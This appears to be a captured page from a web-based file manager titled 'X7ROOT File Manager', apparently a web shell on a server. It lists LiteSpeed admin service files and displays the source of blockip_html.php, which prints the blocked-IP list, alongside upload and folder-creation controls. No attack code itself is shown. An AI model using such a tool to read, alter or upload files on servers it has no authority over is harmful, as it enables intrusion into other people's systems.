X7ROOT File Manager
Current Path:
/usr/local/lsws/admin/html.6.2.1/service
usr
/
local
/
lsws
/
admin
/
html.6.2.1
/
service
/
??
..
??
blockip_html.php
(648 B)
??
graph_html.php
(7.04 KB)
??
graph_xml.php
(3.21 KB)
??
homeCont.php
(5.3 KB)
??
logViewer.php
(2.1 KB)
??
realtimeReport.php
(11.44 KB)
??
realtimeReqReport.php
(6.89 KB)
??
restart.html
(634 B)
??
serviceMgr.php
(2.07 KB)
??
verMgrCont.php
(3.42 KB)
??
verMgrDownload.php
(525 B)
Editing: blockip_html.php
<?php require_once('../includes/auth.php'); $stats = new STATS(); $stats->parse_all(); $blocked_count = count($stats->blocked_ip); $help_key = 'antiddos_blocked_ip'; $dhelp_item = DATTR_HELP::GetInstance()->GetItem($help_key); $help = '  ' . $dhelp_item->render($help_key); echo GUI::header(); ?> <table class="xtbl" width="100%" border="0" cellpadding="4" cellspacing="1"> <tr height="15"><td class="xtbl_title">Current Blocked IP List (Total <?php echo $blocked_count . ')' . $help; ?> </tr> <tr class="xtbl_value"><td> <?php echo join(', ', $stats->blocked_ip); ?> </td></tr> </table> <?php echo GUI::footer();
Upload File
Create Folder